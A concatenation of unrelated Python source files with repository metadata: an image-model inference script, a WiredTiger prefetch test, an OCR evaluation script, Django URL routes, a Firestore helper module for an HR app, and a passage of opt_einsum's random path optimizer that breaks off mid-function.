def normalize1_and_gamma(arr, bits=16, beta=1/2.2):
arr = arr / (2**bits -1) # (0, 1)
arr = arr ** beta # (0, 1)
return arr
def main():
# model name
model_name = 'unetv2'
model_name = 'unet'
# model sig
model_sig = 'noise3'
# get model
model = get_model(model_name, model_sig)
# test data
PATH_PIXELSHIFT = 'C:/Users/AI38/datasets/pixelshfit/PixelShift200_test'
files = glob.glob(os.path.join(PATH_PIXELSHIFT, '*_3ch.npy'))
pad_size = 32
patch_size = 128
# shape = np.load(files[0]).shape
# height, width, channels = np.load(files[0]).shape
# npatches_y, npatches_x = math.ceil(shape[0]/patch_size), math.ceil(shape[1]/patch_size)
# print(arr_pred.shape)
for idx, file in enumerate(files):
arr = np.load(file) # (0, 65535)
# arr = arr / (2**16 -1) # (0, 1)
# arr = arr ** (1/2.2) # (0, 1)
arr = normalize1_and_gamma(arr)
img_arr = Image.fromarray( (arr*255).astype(np.uint8) )
img_arr.save(os.path.join(PATH_PIXELSHIFT, f'inf_ref_%02d.png'%(idx+1)))
print('arr.shape', arr.shape)
arr = np.pad(arr, ((pad_size, pad_size), (pad_size, pad_size),(0, 0)), 'symmetric')
print('arr.shape', arr.shape)
height, width, channels = arr.shape
npatches_y = math.ceil((height+2*pad_size) / (patch_size-2*pad_size))
npatches_x = math.ceil((width +2*pad_size) / (patch_size-2*pad_size))
arr_pred = np.zeros_like(arr)
print(idx, file, arr.shape, arr_pred.shape)
# exit()
cnt=0
tcnt= npatches_x*npatches_y
for idx_y in range(npatches_y):
for idx_x in range(npatches_x):
if(cnt%10==0):
print(f'{cnt} / {tcnt}')
cnt+=1
sy = idx_y * (patch_size-2*pad_size)
ey = sy + patch_size
sx = idx_x * (patch_size-2*pad_size)
ex = sx + patch_size
if ey >= height:
ey = height-1
sy = height-patch_size-1
if ex >= width:
ex = width-1
sx = width-patch_size-1
arr_patch = arr[sy:ey, sx:ex,:]
print(np.amin(arr_patch), np.amax(arr_patch) )
# pre-process
arr_patch = arr_patch**(1/2.2)
arr_patch = (arr_patch*2) -1 # (0, 1) -> (-1, 1)
# prediction
pred = model.predict(arr_patch[np.newaxis,...])
print(pred.shape)
# post-process
arr_pred[sy+pad_size:ey-pad_size, sx+pad_size:ex-pad_size, :] = \
(pred[0, pad_size:-pad_size, pad_size:-pad_size, :]+1)/2 # (-1, 1) -> (0, 1)
# print(np.amin(arr_patch), np.amax(arr_patch), np.amin(arr_pred), np.amax(arr_pred))
# exit()
# arr_pred.astype(np.uint8)
arr_pred = arr_pred[pad_size:-pad_size, pad_size:-pad_size, :]
img_pred = Image.fromarray((arr_pred*255).astype(np.uint8))
# name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d.png'%(idx+1))
name = os.path.join(PATH_PIXELSHIFT, f'inf_{model_name}_{model_sig}_%02d_gamma.png'%(idx+1))
img_pred.save(name)
print(np.amin(img_pred), np.amax(img_pred), np.amin(arr_pred.astype(np.uint8)), np.amax(arr_pred.astype(np.uint8)))
exit()
if __name__ == '__main__':
main() | samsungexpert/snu | myinference_srgb2raw_tf.py | myinference_srgb2raw_tf.py | py | 4,612 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "glob.glob",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 1... |
36955645899 | import os
import helper, wiredtiger, wttest
from wtscenario import make_scenarios
# test_prefetch01.py
# Test basic functionality of the prefetch configuration.
class test_prefetch01(wttest.WiredTigerTestCase):
new_dir = 'new.dir'
conn_avail = [
('available', dict(available=True)),
('not-available', dict(available=False))
]
conn_default = [
('default-off', dict(default=True)),
('default-on', dict(default=False)),
]
session_cfg = [
('no-config', dict(scenario='no-config', enabled=False, has_config=False)),
('enabled', dict(scenario='enabled', enabled=True, has_config=True)),
('not-enabled', dict(scenario='not-enabled', enabled=False, has_config=True)),
]
scenarios = make_scenarios(conn_avail, conn_default, session_cfg)
def test_prefetch_config(self):
conn_cfg = 'prefetch=(available=%s,default=%s)' % (str(self.available).lower(), str(self.default).lower())
session_cfg = ''
msg = '/pre-fetching cannot be enabled/'
if self.has_config:
session_cfg = 'prefetch=(enabled=%s)' % (str(self.enabled).lower())
os.mkdir(self.new_dir)
helper.copy_wiredtiger_home(self, '.', self.new_dir)
if not self.available and self.default:
# Test that we can't enable a connection's sessions to have pre-fetching when
# pre-fetching is configured as unavailable.
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: self.wiredtiger_open(self.new_dir, conn_cfg), msg)
elif not self.available and self.enabled:
# Test that we can't enable a specific session to have pre-fetching turned on
# if pre-fetching is configured as unavailable.
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
self.assertRaisesWithMessage(wiredtiger.WiredTigerError,
lambda: new_conn.open_session(session_cfg), msg)
else:
new_conn = self.wiredtiger_open(self.new_dir, conn_cfg)
new_session = new_conn.open_session(session_cfg)
self.assertEqual(new_session.close(), 0)
if __name__ == '__main__':
wttest.run()
| mongodb/mongo | src/third_party/wiredtiger/test/suite/test_prefetch01.py | test_prefetch01.py | py | 2,236 | python | en | code | 24,670 | github-code | 36 | [
{
"api_name": "wttest.WiredTigerTestCase",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "wtscenario.make_scenarios",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "os.mkdir",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "help... |
2796043458 | import argparse
import os
from glob import glob
import json
import jellyfish
from text_extraction import Rectangle, AUTHOR_LABEL, DESCRIPTION_LABEL
import re
import pandas as pd
from tqdm import tqdm
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--input-folder", required=True, help="Folder with the json file")
ap.add_argument("-o", "--output-folder", required=True, help="Folder with the saved corrected json files")
args = ap.parse_args()
INPUT_FOLDER = args.input_folder
OUTPUT_FOLDER = args.output_folder
input_elements = sorted([os.path.basename(f) for f in glob(os.path.join(OUTPUT_FOLDER, '*.json'))])
def get_transcription(basename, groundtruth: bool):
saved_file = os.path.join(OUTPUT_FOLDER, basename)
if groundtruth:
with open(saved_file, 'r') as f:
return json.load(f)
else:
input_file = os.path.join(INPUT_FOLDER, basename)
rects = Rectangle.load_from_json(input_file)
return {
AUTHOR_LABEL: next((r.text for r in rects if r.label == AUTHOR_LABEL), ''),
DESCRIPTION_LABEL: next((r.text for r in rects if r.label == DESCRIPTION_LABEL), '')
}
def normalized_str(s):
s = s.lower()
s = re.sub(r"[,;\-\.\n\(\)']", ' ', s)
s = re.sub(' +', ' ', s)
return s.strip()
results = []
for basename in tqdm(input_elements):
gt_transcription = get_transcription(basename, groundtruth=True)
input_transcription = get_transcription(basename, groundtruth=False)
gt_author, gt_description = gt_transcription[AUTHOR_LABEL], gt_transcription[DESCRIPTION_LABEL]
extracted_author, extracted_description = input_transcription[AUTHOR_LABEL], input_transcription[DESCRIPTION_LABEL]
# print(gt_author, gt_description, extracted_author, extracted_description)
try:
results.append({
'basename': basename,
'author_error': jellyfish.damerau_levenshtein_distance(gt_author, extracted_author),
'description_error': jellyfish.damerau_levenshtein_distance(gt_description, extracted_description),
'author_len': len(gt_author),
'description_len': len(gt_description),
'author_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_author),
normalized_str(extracted_author)),
'description_error_normalized': jellyfish.damerau_levenshtein_distance(normalized_str(gt_description),
normalized_str(
extracted_description))
})
if jellyfish.damerau_levenshtein_distance(normalized_str(gt_author), normalized_str(extracted_author))>0:
print(gt_author, extracted_author)
except Exception:
print(basename)
df = pd.DataFrame.from_records(results)
print('CER (author) : {:.2f}'.format(100 * df.author_error.sum() / df.author_len.sum()))
print('CER (description) : {:.2f}'.format(100 * df.description_error.sum() / df.description_len.sum()))
print('CER (author, normalized) : {:.2f}'.format(100 * df.author_error_normalized.sum() / df.author_len.sum()))
print('CER (description, normalized) : {:.2f}'.format(
100 * df.description_error_normalized.sum() / df.description_len.sum()))
print('Perfect transcription (author) : {:.2f}'.format(100 * (df.author_error == 0).sum() / len(df)))
print('Perfect transcription (description) : {:.2f}'.format(100 * (df.description_error == 0).sum() / len(df)))
print('Perfect transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized == 0).sum() / len(df)))
print('Perfect transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized == 0).sum() / len(df)))
print('1-away transcription (author) : {:.2f}'.format(100 * (df.author_error <= 1).sum() / len(df)))
print('1-away transcription (description) : {:.2f}'.format(100 * (df.description_error <= 1).sum() / len(df)))
print('1-away transcription (author, normalized) : {:.2f}'.format(
100 * (df.author_error_normalized <= 1).sum() / len(df)))
print('1-away transcription (description, normalized) : {:.2f}'.format(
100 * (df.description_error_normalized <= 1).sum() / len(df)))
| paulguhennec/Cini-Project | Process-Images/ocr_evaluation.py | ocr_evaluation.py | py | 4,367 | python | en | code | null | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.basename",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "glob.glob",
... |
5603935400 | from django.urls import path
from . import views
# Application namespace: enables reversing as 'base:home', 'base:contact_us', etc.
app_name = 'base'
# URL routes of the 'base' app; each maps a path to a view function in views.py.
urlpatterns = [
path('home/', views.landing_page, name='home'),
path('school_registered/', views.school_list_page, name='school_registered'),
path('contact_us/', views.contact_us_page, name='contact_us'),
]
| zuri-training/Project-My-Debtors-Team-38 | SDM/base/urls.py | urls.py | py | 293 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "django.urls.path",
"line_number": 9,
"usage_type": "call"
}
] |
29421162955 | import firebase_admin
from firebase_admin import credentials, firestore
import os
from gcloud import storage
from pprint import pprint
from datetime import datetime
import ast
from django import template
# Module-level counters used to build unique document/blob names.
# NOTE(review): they reset to 1 on every process restart — existing blobs
# with the same index may be overwritten; confirm this is acceptable.
INDEX = 1
INDEX_historic = 1
INDEX_cv = 1
# Setup the connexion to the project
cred = credentials.Certificate("./website/serviceAccountKey.json")
#cred = credentials.Certificate("serviceAccountKey.json")
firebase_admin.initialize_app(cred)
# Shared Firestore client and Cloud Storage client used by the helpers below.
db = firestore.client()
os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'./website/serviceAccountKey.json'
#os.environ['GOOGLE_APPLICATION_CREDENTIALS'] = r'serviceAccountKey.json'
storage_client = storage.Client()
def increment_index_historic():
    """Increment the global INDEX_historic counter.

    Keeps history-document names unique in the database.
    Returns the new counter value.
    """
    global INDEX_historic
    INDEX_historic = INDEX_historic + 1
    return INDEX_historic
def increment_index():
    """Increment the global INDEX counter.

    Keeps job-description blob names unique in the database.
    Returns the new counter value.
    """
    global INDEX
    INDEX = INDEX + 1
    return INDEX
def increment_index_cv():
    """Increment the global INDEX_cv counter.

    Keeps uploaded-resume (CV) blob names unique in the storage bucket.
    (The previous docstring was copied from the history counter and
    described the wrong counter.)
    Returns the new counter value.
    """
    global INDEX_cv
    INDEX_cv += 1
    return INDEX_cv
def add_CV(name_hr, url_desc, file, name, date, lieu, dict_infos):
    """Register an uploaded resume (CV) for a job description in Firestore.

    Parameters:
      name_hr    -- name of the HR user owning the job description
      url_desc   -- gs:// URI of the job description; its basename is the job index
      file       -- local path of the resume file (currently unused: the actual
                    upload to the "snipehr_cvs" bucket is disabled upstream)
      name       -- candidate name
      date       -- submission date string
      lieu       -- candidate location
      dict_infos -- parsed resume info; must contain 'email', 'phone' and 'skills'
    """
    # e.g. "gs://snipehr_job_desc/1.txt" -> "1"
    index_job = url_desc.split("/")[-1].split('.')[0]
    # Unique storage name: <hr>_<job index>_<cv counter>.
    # (Fixed: the old code declared `global INDEX_historic` although this
    # function only reads INDEX_cv and assigns neither.)
    name_file = name_hr + "_" + index_job + "_" + str(INDEX_cv)
    increment_index_cv()
    db = firestore.client()
    # NOTE(review): only the Firestore record pointing at the blob is created;
    # the blob itself is never uploaded — confirm this is intended.
    new_cv = {
        'name': name,
        'lieu': lieu,
        'email': dict_infos['email'],
        'phone': dict_infos['phone'],
        'date': date,
        'status': False,
        'url_resume': "gs://snipehr_cvs/" + name_file,
        'skills': dict_infos['skills'],
    }
    db.collection('hrs').document(read_hr(name_hr).id).collection('resumes').add(new_cv)
def read_file_as_file(uri,name,date,poste):
"""Download the blob at *uri* from Cloud Storage to a local PDF.

The file is saved as resumes/<name>_<poste>_<date>.pdf.
NOTE(review): download_to_filename() returns None, so this function
returns None on success and "" when uri is None — confirm callers do
not rely on the return value.
"""
destination = "resumes/"+name+"_"+poste+"_"+date+'.pdf'
blob=""
if(uri != None):
# uri looks like gs://<bucket>/<blob name>
bucket = storage_client.get_bucket(uri.split("/")[-2])
blob = bucket.blob(uri.split("/")[-1])
blob = blob.download_to_filename(destination)
#blob = blob.decode('utf-8')
return blob
def read_file(uri):
"""Read the job-description blob stored in Cloud Storage at *uri*.

Returns the blob contents decoded as UTF-8, or "" when uri is None.
"""
blob=""
if(uri != None):
# uri looks like gs://<bucket>/<blob name>
bucket = storage_client.get_bucket(uri.split("/")[-2])
blob = bucket.blob(uri.split("/")[-1])
blob = blob.download_as_string()
blob = blob.decode('utf-8')
return blob
def liste_historic(name_hr,url_desc):
"""Return the list of history entries for a given job description.

Each entry is a dict parsed (via ast.literal_eval) from a blob named
<name_hr>_<job index>_<n>.txt in the "snipehr_historic" bucket.
"""
liste =[]
# e.g. "gs://snipehr_job_desc/1.txt" -> "1"
index_job =url_desc.split("/")[-1].split('.')[0]
name_file = name_hr + "_" + index_job
my_bucket = storage_client.get_bucket("snipehr_historic")
blobs_all = list(my_bucket.list_blobs(prefix=name_file)) # fetch blobs whose name starts with <hr name>_<job index>
print(blobs_all)
for blob in blobs_all:
blob = blob.download_as_string()
blob = blob.decode('utf-8')
liste.append(ast.literal_eval(blob))
return liste
def add_historic(name_hr, commentaire, url_desc):
"""Add a history entry (date + comment) for a given job description.

The entry is stored as a stringified dict in the "snipehr_historic"
bucket under the name <name_hr>_<job index>_<INDEX_historic>.txt.
"""
# NOTE(review): the `global` declaration is unnecessary — this function
# only reads INDEX_historic; the increment happens in the helper below.
global INDEX_historic
date = datetime.today().strftime('%Y-%m-%d')
#name_file = "gs://snipehr_historic/"
index_job =url_desc.split("/")[-1].split('.')[0] # e.g. gs://snipehr_job_desc/1.txt -> "1"
my_bucket = storage_client.get_bucket("snipehr_historic")
#pprint(vars(my_bucket))
print(index_job)
name = name_hr + "_" + index_job + "_" + str(INDEX_historic)+".txt"
increment_index_historic()
#text_file = open(name, "w")
#n = text_file.write(commentaire)
#text_file.close()
# Serialize as a Python-literal dict; liste_historic() parses it back
# with ast.literal_eval.
historic =str({"date":date,"commentaire":commentaire})
blob = my_bucket.blob(name)
blob.upload_from_string(historic)
print(blob)
def get_nb_missions_affectees(liste_jobs):
    """Return the number of assigned missions among *liste_jobs*.

    A job dict counts as assigned when its 'status' entry is truthy.
    Returns 0 for an empty list.
    """
    # sum over a generator replaces the manual counter loop
    return sum(1 for job in liste_jobs if job["status"])
def set_status(name_hr,job_to_set):
"""Toggle the 'status' field of the matching job description in Firestore.

*job_to_set* is a job dict; matching is delegated to get_job(), which
compares on ('url_desc', 'date').
"""
job =get_job(name_hr,job_to_set)
print(job)
print(job.to_dict()["status"])
hr=read_hr(name_hr)
status = job.to_dict()["status"]
# invert the current boolean status in place
db.collection('hrs').document(hr.id).collection('job_description').document(job.id).update({"status": not status})
def read_company(name_hr):
    """Return the company of the connected HR user *name_hr*."""
    hr_doc = read_hr(name_hr)
    return hr_doc.to_dict()["company"]
def chiffrement_message(message, clef):
    """Placeholder for message encryption; not implemented yet (returns None)."""
    return None
def dechiffrement_message(message, clef):
    """Placeholder for message decryption; not implemented yet (returns None)."""
    return None
def create_message(name_hr,message,nom,post):
"""Store a message for the HR *name_hr* in Firestore.

NOTE(review): despite the original docstring, no encryption is applied —
chiffrement_message() is still a stub.
"""
db = firestore.client()
date = datetime.today().strftime('%Y-%m-%d')
new_message={
'date': f'{date}',
'message': f'{message}',
'candidat':f'{nom}',
'post':f'{post}'
}
db.collection('hrs').document(read_hr(name_hr).id).collection('messages').add(new_message)
return None
# Add a job description: upload its text to the "snipehr_job_desc" bucket
# under <INDEX>.txt and create the matching Firestore record for the HR.
def create_job_desc(titre,lieu, date, competences, fiche, name_hr):
global INDEX
# NOTE(review): this string sits after `global INDEX`, so it is not a real
# docstring — just a no-op expression statement.
"""Fonction qui ajoute une fiche de poste dans la base de donée"""
url_desc="gs://snipehr_job_desc/"
url_historic="gs://snipehr_historic/"
# NOTE(review): no-op self-assignment
lieu =lieu
my_bucket = storage_client.get_bucket("snipehr_job_desc")
#pprint(vars(my_bucket))
name = str(INDEX)+".txt"
increment_index()
#text_file = open(name, "w")
#n = text_file.write(fiche)
#text_file.close()
blob = my_bucket.blob(name)
blob.upload_from_string(fiche)
url_desc+=name
db = firestore.client()
new_job_desc={
'titre': f'{titre}',
'lieu' :f'{lieu}',
'date': f'{date}',
'status': False,
'url_desc': f'{url_desc}',
'url_historic': f'{url_historic}',
'skills':f'{competences}'
}
#print(name_hr)
db.collection('hrs').document(read_hr(name_hr).id).collection('job_description').add(new_job_desc)
def create_hr(name_hr, email_hr, mdp_hr, company_hr):
    """Create an HR user document in the 'hrs' collection.

    NOTE(review): the password ('mdp') is stored in plain text — it should
    be hashed before persisting.
    """
    db = firestore.client()
    # A voir pour ajouter le doc avec un id auto généré
    new_hr = {
        'name': f'{name_hr}',
        'email': f'{email_hr}',
        'mdp': f'{mdp_hr}',
        'company': f'{company_hr}'
    }
    db.collection('hrs').add(new_hr)
    # Firestore creates sub-collections implicitly on first write, so no
    # explicit 'job_description' creation is needed here.  The previous
    # call passed a string to DocumentReference.collections(), whose only
    # parameter is page_size, and created nothing.
def set_hr(past_name, name_hr, email_hr, company_hr):
    """Update the name/email/company of the HR document named *past_name*."""
    client = firestore.client()
    updated_fields = {
        'name': f'{name_hr}',
        'email': f'{email_hr}',
        'company': f'{company_hr}'
    }
    target = read_hr(past_name)
    client.collection('hrs').document(target.id).update(updated_fields)
def get_job(name_hr,job_to_set):
"""Return the Firestore snapshot of the job matching *job_to_set*.

Jobs are compared on their ('url_desc', 'date') fields only.
Returns None implicitly when no job matches.
"""
col_jobs = db.collection('hrs').document(read_hr(name_hr).id).collection('job_description')
jobs = col_jobs.stream()
# keep only the keys listed in y from dict x
dictfilt = lambda x, y: dict([(i, x[i]) for i in x if i in set(y)])
for job in jobs:
print(dictfilt(job.to_dict(),("url_desc","date")))
print(dictfilt(job_to_set,("url_desc","date")))
#print(dictfilt(job.to_dict(),("date","titre","url_desc","url_historic")))
if dictfilt(job_to_set,("url_desc","date")) == dictfilt(job.to_dict(),("url_desc","date")):
return job
def read_hr(name_hr):
"""Return the first Firestore document in 'hrs' whose name equals *name_hr*.

Returns None implicitly when no HR matches.
"""
# Only get 1 document or hrs
col_hrs = db.collection('hrs').where("name", '==', f'{name_hr}')
hrs = col_hrs.stream()
# return on the first hit; the stream is abandoned afterwards
for hr in hrs:
#print(f'{hr.id} => {hr.to_dict()}')
return hr
def read_hrs():
    """Print every HR document (id and contents) in the 'hrs' collection."""
    for hr_doc in db.collection('hrs').stream():
        print(f'{hr_doc.id} => {hr_doc.to_dict()}')
def test(email_hr, mdp_hr):
"""Debug helper: print the HR documents matching an email/password pair.

NOTE(review): compares the password in plain text ('mdp' field).
"""
hr = db.collection('hrs').where("email", '==', f'{email_hr}').where("mdp", '==', f'{mdp_hr}').get()
print(hr)
for h in hr:
print(f'{h.id} => {h.to_dict()}')
def read_jobs(name_hr):
    """Return the list of job-description dicts attached to the HR *name_hr*."""
    docs = db.collection('hrs').document(read_hr(name_hr).id).collection("job_description").stream()
    return [doc.to_dict() for doc in docs]
def read_resumes(name_hr):
    """Return the list of resume dicts attached to the HR *name_hr*."""
    docs = db.collection('hrs').document(read_hr(name_hr).id).collection("resumes").stream()
    return [doc.to_dict() for doc in docs]
def read_messages(name_hr):
    """Return the messages of the HR *name_hr*, each tagged with a 1-based 'index'.

    Improvements: the manual counter and the dict variable leaked outside
    the loop are replaced with enumerate(..., start=1).
    """
    messages = db.collection('hrs').document(read_hr(name_hr).id).collection('messages').stream()
    list_messages = []
    for i, message in enumerate(messages, start=1):
        message_dict = message.to_dict()
        message_dict['index'] = i
        list_messages.append(message_dict)
    return list_messages
def get_job_title(name_hr, url_resume):
    """Return the title of the job a resume was submitted for ('' if none matches).

    The job index is embedded in the resume blob name: <hr>_<job index>_<n>.
    """
    job_index = url_resume.split("/")[-1].split("_")[-2]
    url_desc = "gs://snipehr_job_desc/" + job_index + '.txt'
    titre = ""
    for job in read_jobs(name_hr):
        if job["url_desc"] == url_desc:
            titre = job["titre"]
    return titre
if __name__ == '__main__':
# Ad-hoc manual test harness; the calls below were enabled one at a time
# during development and are intentionally left commented out.
#create_hr('Khalida', 'test@gmail.fr', 'azerty', 'ESGI')
#read_hr('Test')
#test('test@test.fr', 'test')
#jobs = read_job(read_hr("Test"))
#print(jobs)
#titre=""
#date=""
#status= True
#url_desc=""
#url_historic =""
#create_job_desc(titre, date, status, url_desc, url_historic, read_hr("Khalida"))
name_hr ="Test"
#job_to_set = {'date': '2022-08-25', 'titre': 'Data Analyst', 'url_desc': '', 'url_historic': ''}
#print(get_job(name_hr,{'titre': 'Data', 'date': '2022-11-10', 'url_desc': 'gs://snipehr_job_desc/1.txt', 'url_historic': 'gs://snipehr_job_desc/'}).to_dict()["status"])
#set_status(name_hr, job_to_set)
#print(get_job(name_hr,job_to_set).to_dict()["status"])
#print(read_job(read_hr("Test"))["jobs"])
#set_status("Test",{'status': False, 'date': '2022-08-25', 'titre': 'Data Analyst', 'url_desc': '', 'url_historic': ''})
#read_file("gs://snipehr_job_desc/1.txt")
commentaire ="Test des commentaires"
url_desc = "gs://snipehr_job_desc/1.txt"
#add_historic(name_hr, commentaire, url_desc)
#add_historic(name_hr, commentaire, url_desc)
#print(liste_historic(name_hr, url_desc))
#print(get_nb_missions_affectees(read_jobs(name_hr)))
#add_CV(name_hr,url_desc,"CVNorayda_NSIEMO.pdf","Norayda NSIEMO","2022-09-23","Paris", dict())
#read_file_as_file("gs://snipehr_cvs/Test_1_1","Norayda NSIEMO","2022-09-23","Data Engineer")
| SnipeHR/SnipeHR-github.io | website/query_firestore.py | query_firestore.py | py | 12,180 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "firebase_admin.credentials.Certificate",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "firebase_admin.credentials",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "firebase_admin.initialize_app",
"line_number": 17,
"usage_type": "call"... |
26716825256 | """
Support for random optimizers, including the random-greedy path.
"""
import functools
import heapq
import math
import numbers
import time
from collections import deque
from random import choices as random_choices
from random import seed as random_seed
from typing import Any, Dict, Generator, Iterable, List, Optional, Tuple
from . import helpers, paths
from .typing import ArrayIndexType, ArrayType, PathType
__all__ = ["RandomGreedy", "random_greedy", "random_greedy_128"]
class RandomOptimizer(paths.PathOptimizer):
"""Base class for running any random path finder that benefits
from repeated calling, possibly in a parallel fashion. Custom random
optimizers should subclass this, and the `setup` method should be
implemented with the following signature:
```python
def setup(self, inputs, output, size_dict):
# custom preparation here ...
return trial_fn, trial_args
```
Where `trial_fn` itself should have the signature::
```python
def trial_fn(r, *trial_args):
# custom computation of path here
return ssa_path, cost, size
```
Where `r` is the run number and could for example be used to seed a
random number generator. See `RandomGreedy` for an example.
**Parameters:**
- **max_repeats** - *(int, optional)* The maximum number of repeat trials to have.
- **max_time** - *(float, optional)* The maximum amount of time to run the algorithm for.
- **minimize** - *({'flops', 'size'}, optional)* Whether to favour paths that minimize the total estimated flop-count or
the size of the largest intermediate created.
- **parallel** - *({bool, int, or executor-pool like}, optional)* Whether to parallelize the random trials, by default `False`. If
`True`, use a `concurrent.futures.ProcessPoolExecutor` with the same
number of processes as cores. If an integer is specified, use that many
processes instead. Finally, you can supply a custom executor-pool which
should have an API matching that of the python 3 standard library
module `concurrent.futures`. Namely, a `submit` method that returns
`Future` objects, themselves with `result` and `cancel` methods.
- **pre_dispatch** - *(int, optional)* If running in parallel, how many jobs to pre-dispatch so as to avoid
submitting all jobs at once. Should also be more than twice the number
of workers to avoid under-subscription. Default: 128.
**Attributes:**
- **path** - *(list[tuple[int]])* The best path found so far.
- **costs** - *(list[int])* The list of each trial's costs found so far.
- **sizes** - *(list[int])* The list of each trial's largest intermediate size so far.
"""
def __init__(
self,
max_repeats: int = 32,
max_time: Optional[float] = None,
minimize: str = "flops",
parallel: bool = False,
pre_dispatch: int = 128,
):
if minimize not in ("flops", "size"):
raise ValueError("`minimize` should be one of {'flops', 'size'}.")
self.max_repeats = max_repeats
self.max_time = max_time
self.minimize = minimize
# comparison function used to decide whether a trial beats the best so far
self.better = paths.get_better_fn(minimize)
# assigning via the `parallel` property below builds the executor if needed
self._parallel = False
self.parallel = parallel
self.pre_dispatch = pre_dispatch
self.costs: List[int] = []
self.sizes: List[int] = []
self.best: Dict[str, Any] = {"flops": float("inf"), "size": float("inf")}
self._repeats_start = 0
self._executor: Any
self._futures: Any
@property
def path(self) -> PathType:
"""The best path found so far."""
return paths.ssa_to_linear(self.best["ssa_path"])
@property
def parallel(self) -> bool:
return self._parallel
@parallel.setter
def parallel(self, parallel: bool) -> None:
# shutdown any previous executor if we are managing it
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
self._parallel = parallel
self._managing_executor = False
if parallel is False:
self._executor = None
return
if parallel is True:
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor()
self._managing_executor = True
return
if isinstance(parallel, numbers.Number):
from concurrent.futures import ProcessPoolExecutor
self._executor = ProcessPoolExecutor(parallel)
self._managing_executor = True
return
# assume a pool-executor has been supplied
self._executor = parallel
def _gen_results_parallel(self, repeats: Iterable[int], trial_fn: Any, args: Any) -> Generator[Any, None, None]:
"""Lazily generate results from an executor without submitting all jobs at once."""
self._futures = deque()
# the idea here is to submit at least ``pre_dispatch`` jobs *before* we
# yield any results, then do both in tandem, before draining the queue
for r in repeats:
if len(self._futures) < self.pre_dispatch:
self._futures.append(self._executor.submit(trial_fn, r, *args))
continue
yield self._futures.popleft().result()
while self._futures:
yield self._futures.popleft().result()
def _cancel_futures(self) -> None:
# cancel any still-pending trials (e.g. after a max_time break)
if self._executor is not None:
for f in self._futures:
f.cancel()
def setup(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
) -> Tuple[Any, Any]:
raise NotImplementedError
def __call__(
self,
inputs: List[ArrayIndexType],
output: ArrayIndexType,
size_dict: Dict[str, int],
memory_limit: Optional[int] = None,
) -> PathType:
self._check_args_against_first_call(inputs, output, size_dict)
# start a timer?
if self.max_time is not None:
t0 = time.time()
trial_fn, trial_args = self.setup(inputs, output, size_dict)
# continue numbering trials across repeated calls so seeds don't repeat
r_start = self._repeats_start + len(self.costs)
r_stop = r_start + self.max_repeats
repeats = range(r_start, r_stop)
# create the trials lazily
if self._executor is not None:
trials = self._gen_results_parallel(repeats, trial_fn, trial_args)
else:
trials = (trial_fn(r, *trial_args) for r in repeats)
# assess the trials
for ssa_path, cost, size in trials:
# keep track of all costs and sizes
self.costs.append(cost)
self.sizes.append(size)
# check if we have found a new best
found_new_best = self.better(cost, size, self.best["flops"], self.best["size"])
if found_new_best:
self.best["flops"] = cost
self.best["size"] = size
self.best["ssa_path"] = ssa_path
# check if we have run out of time
if (self.max_time is not None) and (time.time() > t0 + self.max_time):
break
self._cancel_futures()
return self.path
def __del__(self):
# if we created the parallel pool-executor, shut it down
if getattr(self, "_managing_executor", False):
self._executor.shutdown()
def thermal_chooser(queue, remaining, nbranch=8, temperature=1, rel_temperature=True):
"""A contraction 'chooser' that weights possible contractions using a
Boltzmann distribution. Explicitly, given costs `c_i` (with `c_0` the
smallest), the relative weights, `w_i`, are computed as:
$$w_i = exp( -(c_i - c_0) / temperature)$$
Additionally, if `rel_temperature` is set, scale `temperature` by
`abs(c_0)` to account for likely fluctuating cost magnitudes during the
course of a contraction.
**Parameters:**
- **queue** - *(list)* The heapified list of candidate contractions.
- **remaining** - *(dict[str, int])* Mapping of remaining inputs' indices to the ssa id.
- **temperature** - *(float, optional)* When choosing a possible contraction, its relative probability will be
proportional to `exp(-cost / temperature)`. Thus the larger
`temperature` is, the further random paths will stray from the normal
'greedy' path. Conversely, if set to zero, only paths with exactly the
same cost as the best at each step will be explored.
- **rel_temperature** - *(bool, optional)* Whether to normalize the `temperature` at each step to the scale of
the best cost. This is generally beneficial as the magnitude of costs
can vary significantly throughout a contraction.
- **nbranch** - *(int, optional)* How many potential paths to calculate probability for and choose from at each step.
**Returns:**
- **cost**
- **k1**
- **k2**
- **k3**
"""
# pop up to nbranch still-valid candidates off the heap
n = 0
choices = []
while queue and n < nbranch:
cost, k1, k2, k12 = heapq.heappop(queue)
if k1 not in remaining or k2 not in remaining:
continue # candidate is obsolete
choices.append((cost, k1, k2, k12))
n += 1
if n == 0:
return None
if n == 1:
return choices[0]
# cost entries are subscriptable; the leading element is the primary cost
# (popped in heap order, so costs[0] is the minimum)
costs = [choice[0][0] for choice in choices]
cmin = costs[0]
# adjust by the overall scale to account for fluctuating absolute costs
if rel_temperature:
temperature *= max(1, abs(cmin))
# compute relative probability for each potential contraction
if temperature == 0.0:
energies = [1 if c == cmin else 0 for c in costs]
else:
